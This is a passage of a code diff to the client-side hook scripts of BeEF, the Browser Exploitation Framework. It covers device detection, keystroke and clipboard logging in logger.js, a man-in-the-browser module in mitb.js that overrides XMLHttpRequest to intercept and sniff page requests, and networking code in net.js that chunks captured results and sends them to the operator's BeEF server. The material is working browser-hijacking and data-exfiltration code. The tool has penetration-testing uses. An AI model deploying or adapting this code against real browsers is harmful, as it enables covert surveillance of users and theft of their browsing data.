+   if (uagent.search(deviceIphone) > -1)
+   {
+      if (DetectIpad() || DetectIpod())
+         return false;
+      else
+         return true;
+   }
+   else
+      return false;
+}
+
+function DetectIpod()
+{
+   if (uagent.search(deviceIpod) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectIpad()
+{
+   if (uagent.search(deviceIpad) > -1  && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+function DetectIphoneOrIpod()
+{
+   if (uagent.search(deviceIphone) > -1 ||
+       uagent.search(deviceIpod) > -1)
+       return true;
+    else
+       return false;
+}
+
+function DetectIos()
+{
+   if (DetectIphoneOrIpod() || DetectIpad())
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroid()
+{
+   if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidPhone()
+{
+   if (DetectAndroid() && (uagent.search(mobile) > -1))
+      return true;
+   if (DetectOperaAndroidPhone())
+      return true;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectAndroidTablet()
+{
+   if (!DetectAndroid())
+      return false;
+
+   if (DetectOperaMobile())
+      return false;
+   if (uagent.search(deviceHtcFlyer) > -1)
+      return false;
+
+   if (uagent.search(mobile) > -1)
+      return false;
+   else
+      return true;
+}
+
+
+function DetectAndroidWebKit()
+{
+   if (DetectAndroid() && DetectWebkit())
+      return true;
+   else
+      return false;
+}
+
+
+function DetectGoogleTV()
+{
+   if (uagent.search(deviceGoogleTV) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectWebkit()
+{
+   if (uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectS60OssBrowser()
+{
+   if (DetectWebkit())
+   {
+     if ((uagent.search(deviceS60) > -1 ||
+          uagent.search(deviceSymbian) > -1))
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectSymbianOS()
+{
+   if (uagent.search(deviceSymbian) > -1 ||
+       uagent.search(deviceS60) > -1 ||
+       uagent.search(deviceS70) > -1 ||
+       uagent.search(deviceS80) > -1 ||
+       uagent.search(deviceS90) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsPhone7()
+{
+   if (uagent.search(deviceWinPhone7) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWindowsMobile()
+{
+   if (DetectWindowsPhone7())
+      return false;
+   if (uagent.search(deviceWinMob) > -1 ||
+       uagent.search(deviceIeMob) > -1 ||
+       uagent.search(enginePie) > -1)
+      return true;
+   if ((uagent.search(devicePpc) > -1) &&
+       !(uagent.search(deviceMacPpc) > -1))
+      return true;
+   if (uagent.search(manuHtc) > -1 &&
+       uagent.search(deviceWindows) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerry()
+{
+   if (uagent.search(deviceBB) > -1)
+      return true;
+   if (uagent.search(vndRIM) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTablet()
+{
+   if (uagent.search(deviceBBPlaybook) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryWebKit()
+{
+   if (DetectBlackBerry() &&
+       uagent.search(engineWebKit) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryTouch()
+{
+   if (DetectBlackBerry() &&
+        ((uagent.search(deviceBBStorm) > -1) ||
+        (uagent.search(deviceBBTorch) > -1) ||
+        (uagent.search(deviceBBBoldTouch) > -1) ||
+        (uagent.search(deviceBBCurveTouch) > -1) ))
+      return true;
+   else
+      return false;
+}
+
+function DetectBlackBerryHigh()
+{
+   if (DetectBlackBerryWebKit())
+      return false;
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryTouch() ||
+        uagent.search(deviceBBBold) > -1 ||
+        uagent.search(deviceBBTour) > -1 ||
+        uagent.search(deviceBBCurve) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectBlackBerryLow()
+{
+   if (DetectBlackBerry())
+   {
+     if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+
+function DetectPalmOS()
+{
+   if (uagent.search(devicePalm) > -1 ||
+       uagent.search(engineBlazer) > -1 ||
+       uagent.search(engineXiino) > -1)
+   {
+     if (DetectPalmWebOS())
+        return false;
+     else
+        return true;
+   }
+   else
+      return false;
+}
+
+function DetectPalmWebOS()
+{
+   if (uagent.search(deviceWebOS) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectWebOSTablet()
+{
+   if (uagent.search(deviceWebOShp) > -1 &&
+       uagent.search(deviceTablet) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectGarminNuvifone()
+{
+   if (uagent.search(deviceNuvifone) > -1)
+      return true;
+   else
+      return false;
+}
+
+
+function DetectSmartphone()
+{
+   if (DetectIphoneOrIpod()
+      || DetectAndroidPhone()
+      || DetectS60OssBrowser()
+      || DetectSymbianOS()
+      || DetectWindowsMobile()
+      || DetectWindowsPhone7()
+      || DetectBlackBerry()
+      || DetectPalmWebOS()
+      || DetectPalmOS()
+      || DetectGarminNuvifone())
+      return true;
+
+   return false;
+};
+
+function DetectArchos()
+{
+   if (uagent.search(deviceArchos) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectBrewDevice()
+{
+   if (uagent.search(deviceBrew) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectDangerHiptop()
+{
+   if (uagent.search(deviceDanger) > -1 ||
+       uagent.search(deviceHiptop) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMaemoTablet()
+{
+   if (uagent.search(maemo) > -1)
+      return true;
+   if ((uagent.search(linux) > -1)
+       && (uagent.search(deviceTablet) > -1)
+       && !DetectWebOSTablet()
+       && !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyMylo()
+{
+   if (uagent.search(manuSony) > -1)
+   {
+     if (uagent.search(qtembedded) > -1 ||
+         uagent.search(mylocom2) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaMobile()
+{
+   if (uagent.search(engineOpera) > -1)
+   {
+     if (uagent.search(mini) > -1 ||
+         uagent.search(mobi) > -1)
+        return true;
+     else
+        return false;
+   }
+   else
+      return false;
+}
+
+function DetectOperaAndroidPhone()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(mobi) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectOperaAndroidTablet()
+{
+   if ((uagent.search(engineOpera) > -1) &&
+      (uagent.search(deviceAndroid) > -1) &&
+      (uagent.search(deviceTablet) > -1))
+      return true;
+   else
+      return false;
+}
+
+function DetectSonyPlaystation()
+{
+   if (uagent.search(devicePlaystation) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectNintendo()
+{
+   if (uagent.search(deviceNintendo) > -1   ||
+	uagent.search(deviceWii) > -1 ||
+	uagent.search(deviceNintendoDs) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectXbox()
+{
+   if (uagent.search(deviceXbox) > -1)
+      return true;
+   else
+      return false;
+};
+
+function DetectGameConsole()
+{
+   if (DetectSonyPlaystation())
+      return true;
+   if (DetectNintendo())
+      return true;
+   if (DetectXbox())
+      return true;
+   else
+      return false;
+};
+
+function DetectKindle()
+{
+   if (uagent.search(deviceKindle) > -1 &&
+       !DetectAndroid())
+      return true;
+   else
+      return false;
+}
+
+function DetectAmazonSilk()
+{
+   if (uagent.search(engineSilk) > -1)
+      return true;
+   else
+      return false;
+}
+
+function DetectMobileQuick()
+{
+   if (DetectTierTablet())
+      return false;
+
+   if (DetectSmartphone())
+      return true;
+
+   if (uagent.search(deviceMidp) > -1 ||
+	DetectBrewDevice())
+      return true;
+
+   if (DetectOperaMobile())
+      return true;
+
+   if (uagent.search(engineNetfront) > -1)
+      return true;
+   if (uagent.search(engineUpBrowser) > -1)
+      return true;
+   if (uagent.search(engineOpenWeb) > -1)
+      return true;
+
+   if (DetectDangerHiptop())
+      return true;
+
+   if (DetectMaemoTablet())
+      return true;
+   if (DetectArchos())
+      return true;
+
+   if ((uagent.search(devicePda) > -1) &&
+        !(uagent.search(disUpdate) > -1))
+      return true;
+   if (uagent.search(mobile) > -1)
+      return true;
+
+   if (DetectKindle() ||
+       DetectAmazonSilk())
+      return true;
+
+   return false;
+};
+
+
+function DetectMobileLong()
+{
+   if (DetectMobileQuick())
+      return true;
+   if (DetectGameConsole())
+      return true;
+   if (DetectSonyMylo())
+      return true;
+
+   if (uagent.search(manuSamsung1) > -1 ||
+	uagent.search(manuSonyEricsson) > -1 ||
+	uagent.search(manuericsson) > -1)
+      return true;
+
+   if (uagent.search(svcDocomo) > -1)
+      return true;
+   if (uagent.search(svcKddi) > -1)
+      return true;
+   if (uagent.search(svcVodafone) > -1)
+      return true;
+
+
+   return false;
+};
+
+
+function DetectTierTablet()
+{
+   if (DetectIpad()
+        || DetectAndroidTablet()
+        || DetectBlackBerryTablet()
+        || DetectWebOSTablet())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierIphone()
+{
+   if (DetectIphoneOrIpod())
+      return true;
+   if (DetectAndroidPhone())
+      return true;
+   if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
+      return true;
+   if (DetectWindowsPhone7())
+      return true;
+   if (DetectPalmWebOS())
+      return true;
+   if (DetectGarminNuvifone())
+      return true;
+   else
+      return false;
+};
+
+function DetectTierRichCss()
+{
+    if (DetectMobileQuick())
+    {
+       if (DetectTierIphone() || DetectKindle())
+          return false;
+
+       if (DetectWebkit())
+          return true;
+       if (DetectS60OssBrowser())
+          return true;
+
+       if (DetectBlackBerryHigh())
+          return true;
+
+       if (DetectWindowsMobile())
+          return true;
+
+       if (uagent.search(engineTelecaQ) > -1)
+          return true;
+
+       else
+          return false;
+    }
+    else
+      return false;
+};
+
+function DetectTierOtherPhones()
+{
+    if (DetectMobileLong())
+    {
+       if (DetectTierIphone() || DetectTierRichCss())
+          return false;
+
+       else
+          return true;
+    }
+    else
+      return false;
+};
+
+
+function InitDeviceScan()
+{
+    isIphone = DetectIphoneOrIpod();
+    isAndroidPhone = DetectAndroidPhone();
+    isTierIphone = DetectTierIphone();
+    isTierTablet = DetectTierTablet();
+
+    isTierRichCss = DetectTierRichCss();
+    isTierGenericMobile = DetectTierOtherPhones();
+};
+
+InitDeviceScan()

core/main/client/logger.js

@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.logger
  *
@@ -59,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {
 
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
@@ -78,10 +70,10 @@ beef.logger = {
 		);
 		document.body.oncopy = function() {
 			setTimeout("beef.logger.copy();", 10);
-		}
+		};
 		document.body.oncut = function() {
 			setTimeout("beef.logger.cut();", 10);
-		}
+		};
 		document.body.onpaste = function() {
 			beef.logger.paste();
 		}

core/main/client/mitb.js

@@ -1,19 +1,10 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
 
+
 beef.mitb = {
 
     cid:null,
@@ -23,47 +14,30 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
-                    var portRegex = new RegExp(":[0-9]+");
-                    var portR = portRegex.exec(url);
-                    /*return :port*/
-                    var requestPort;
-
-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -72,26 +46,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -170,14 +137,14 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(query);
             beef.mitb.sniff("POST: " + url + "[" + query + "]");
             return true;
@@ -190,14 +157,13 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -213,7 +179,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
@@ -227,16 +193,14 @@ beef.mitb = {
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
-
+            // the link is cross-domain, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 
@@ -253,4 +217,6 @@ beef.mitb = {
     endSession:function () {
         beef.mitb.sniff("Window closed.");
     }
-}
+};
+
+beef.regCmp('beef.mitb');

core/main/client/net.js

@@ -1,67 +1,74 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.net
  *
- * Provides basic networking functions.
+ * Provides basic networking functions,
+ * like beef.net.request and beef.net.forgeRequest,
+ * used by BeEF command modules and the Requester extension,
+ * as well as beef.net.send which is used to return commands
+ * to BeEF server-side components.
+ *
+ * Also, it contains the core methods used by the XHR-polling
+ * mechanism (flush, queue)
  */
 beef.net = {
 
-    host: "<%= @beef_host %>",
-    port: "<%= @beef_port %>",
-    hook: "<%= @beef_hook %>",
-    handler: '/dh',
-    chop: 500,
-    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
-    sid_count: 0,
-    cmd_queue: [],
+    host:"<%= @beef_host %>",
+    port:"<%= @beef_port %>",
+    hook:"<%= @beef_hook %>",
+    httpproto:"<%= @beef_proto %>",
+    handler:'/dh',
+    chop:500,
+    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
+    sid_count:0,
+    cmd_queue:[],
 
-    //Command object
-    command: function() {
+    /**
+     * Command object. This represents the data to be sent back to BeEF,
+     * using the beef.net.send() method.
+     */
+    command:function () {
         this.cid = null;
         this.results = null;
         this.handler = null;
         this.callback = null;
     },
 
-    //Packet object
-    packet: function() {
+    /**
+     * Packet object. A single chunk of data. X packets -> 1 stream
+     */
+    packet:function () {
         this.id = null;
         this.data = null;
     },
 
-    //Stream object
-    stream: function() {
+    /**
+     * Stream object. Contains X packets, which are command result chunks.
+     */
+    stream:function () {
         this.id = null;
         this.packets = [];
         this.pc = 0;
-        this.get_base_url_length = function() {
+        this.get_base_url_length = function () {
             return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
-        },
-            this.get_packet_data = function() {
-                var p = this.packets.shift();
-                return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
-            };
+        };
+        this.get_packet_data = function () {
+             var p = this.packets.shift();
+             return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
+        };
     },
 
     /**
      * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
+     * Using sync mode, request obj fields will be populated.
      */
-    response: function() {
+    response:function () {
         this.status_code = null;        // 500, 404, 200, 302
         this.status_text = null;        // success, timeout, error, ...
         this.response_body = null;      // "<html>…." if not a cross domain request
@@ -72,8 +79,14 @@ beef.net = {
         this.headers = null;            // full response headers
     },
 
-    //Queues the command, to be sent back to the framework on the next refresh
-    queue: function(handler, cid, results, callback) {
+    /**
+     * Queues the specified command results.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
+    queue:function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
             s.cid = cid;
@@ -84,14 +97,41 @@ beef.net = {
         }
     },
 
-    //Queues the current command and flushes the queue straight away
-    send: function(handler, cid, results, callback) {
-        this.queue(handler, cid, results, callback);
-        this.flush();
+    /**
+     * Queues the current command results and flushes the queue straight away.
+     * NOTE: Always send Browser Fingerprinting results
+     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
+     * even if WebSockets are enabled.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
+    send:function (handler, cid, results, callback) {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
+            this.queue(handler, cid, results, callback);
+            this.flush();
+        }else {
+            try {
+                beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+                    '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+                    '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+            }catch (e) {
+                this.queue(handler, cid, results, callback);
+                this.flush();
+            }
+        }
     },
 
-    //Flush all currently queued commands to the framework
-    flush: function() {
+    /**
+     * Flush all currently queued command results to the framework,
+     * chopping the data in chunks ('chunk' method) which will be re-assembled
+     * server-side by the network stack.
+     * NOTE: currently 'flush' is used only with the default
+     * XHR-polling mechanism. If WebSockets are used, the data is sent
+     * back to BeEF straight away.
+     */
+    flush:function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
             this.cmd_queue.length = 0;
@@ -114,22 +154,30 @@ beef.net = {
         }
     },
 
-    //Split string into chunk lengths determined by amount
-    chunk: function(str, amount) {
+    /**
+     * Split the input data into chunk lengths determined by the amount parameter.
+     * @param: {String} str: the input data
+     * @param: {Integer} amount: chunk length
+     */
+    chunk:function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
 
-    //Push packets to framework
-    push: function(stream) {
+    /**
+     * Push the input stream back to the BeEF server-side components.
+     * It uses beef.net.request to send back the data.
+     * @param: {Object} stream: the stream object to be sent back.
+     */
+    push:function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
-            this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
+            this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
         }
     },
 
     /**
-     *Performs http requests
+     * Performs http requests
      * @param: {String} scheme: HTTP or HTTPS
      * @param: {String} method: GET or POST
      * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -143,10 +191,10 @@ beef.net = {
      *
      * @return: {Object} response: this object contains the response details
      */
-    request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
         //check if same domain or cross domain
         var cross_domain = true;
-        if (document.domain == domain){
+		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
             if(document.location.port == "" || document.location.port == null){
                 cross_domain = !(port == "80" || port == "443");
             }
@@ -154,9 +202,9 @@ beef.net = {
 
         //build the url
         var url = "";
-        if(path.indexOf("http://") != -1 || path.indexOf("https://") != -1){
+        if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
             url = path;
-        }else{
+        } else {
             url = scheme + "://" + domain;
             url = (port != null) ? url + ":" + port : url;
             url = (path != null) ? url + path : url;
@@ -176,26 +224,25 @@ beef.net = {
            $j.ajaxSetup({
               dataType: dataType
            });
-        }else{ //GET, HEAD, ...
+        } else {
            $j.ajaxSetup({
-               dataType: 'script'
+                dataType: 'script'
            });
         }
 
         //build and execute the request
-        $j.ajax({type: method,
-            url: url,
-            data: data,
-            timeout: (timeout * 1000),
+        $j.ajax({type:method,
+            url:url,
+            data:data,
+            timeout:(timeout * 1000),
 
-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
-            beforeSend: function(xhr) {
-                if(method == "POST"){
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
+            beforeSend:function (xhr) {
+                if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-
-            success: function(data, textStatus, xhr) {
+            success:function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -204,14 +251,14 @@ beef.net = {
                 response.was_timedout = false;
                 response.duration = (end_time - start_time);
             },
-            error: function(jqXHR, textStatus, errorThrown) {
+            error:function (jqXHR, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = jqXHR.responseText;
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.duration = (end_time - start_time);
             },
-            complete: function(jqXHR, textStatus) {
+            complete:function (jqXHR, textStatus) {
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.headers = jqXHR.getAllResponseHeaders();
@@ -226,26 +273,29 @@ beef.net = {
                     response.port_status = "open";
                 }
             }
-        }).done(function() {
-            if (callback != null) {
-                callback(response);
-            }
-        });
+        }).done(function () {
+                if (callback != null) {
+                    callback(response);
+                }
+            });
         return response;
     },
 
     /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
      *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *
+     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
-    forge_request: function(scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
         // check if same domain or cross domain
         var cross_domain = true;
-        if (document.domain == domain) {
+
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
            if(document.location.port == "" || document.location.port == null){
-              cross_domain = !(port == "80" || port == "443");
+               cross_domain = !(port == "80" || port == "443");
            } else {
               if (document.location.port == port) cross_domain = false;
            }
@@ -274,35 +324,45 @@ beef.net = {
             response.status_text = "crossdomain";
             response.port_status = "crossdomain";
             response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
-			response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
+            response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
             callback(response, requestid);
             return response;
         }
 
-        // build and execute the request
+        /*
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
         if (method == "POST"){
-          $j.ajaxSetup({
-              data: data
-          });
+            $j.ajaxSetup({
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
+            });
+        }
+
+		// this is required for bugs in IE so data can be transferred back to the server
+        if ( beef.browser.isIE() ) {
+            dataType = 'script'
         }
 
         $j.ajax({type: method,
-            dataType: 'script', // this is required for bugs in IE so data can be transfered back to the server
+            dataType: dataType,
             url: url,
             headers: headers,
             timeout: (timeout * 1000),
 
-            // needed otherwise jQuery always adds:
-            // Content-type: application/xml
-            // even if data is populated
-            beforeSend: function(xhr) {
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
+            beforeSend:function (xhr) {
                 if (method == "POST") {
-                   xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
+                    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
 
             // http server responded successfully
-            success: function(data, textStatus, xhr) {
+            success:function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -313,7 +373,7 @@ beef.net = {
 
             // server responded with a http error (403, 404, 500, etc)
             // or server is not a http server
-            error: function(xhr, textStatus, errorThrown) {
+            error:function (xhr, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = xhr.responseText;
                 response.status_code = xhr.status;
@@ -321,14 +381,34 @@ beef.net = {
                 response.duration = (end_time - start_time);
             },
 
-            complete: function(xhr, textStatus) {
+            complete:function (xhr, textStatus) {
                 // cross-domain request
                 if (cross_domain) {
-                    response.status_code = -1;
-                    response.status_text = "crossdomain";
-                    response.port_status = "crossdomain";
-                    response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-                    response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+
+					response.port_status = "crossdomain";
+
+                    if (xhr.status != 0) {
+						response.status_code = xhr.status;
+					} else {
+						response.status_code = -1;
+					}
+
+					if (textStatus) {
+                    	response.status_text = textStatus;
+					} else {
+						response.status_text = "crossdomain";
+					}
+
+					if (xhr.getAllResponseHeaders()) {
+	                    response.headers = xhr.getAllResponseHeaders();
+					} else {
+						response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+					}
+
+					if (!response.response_body) {
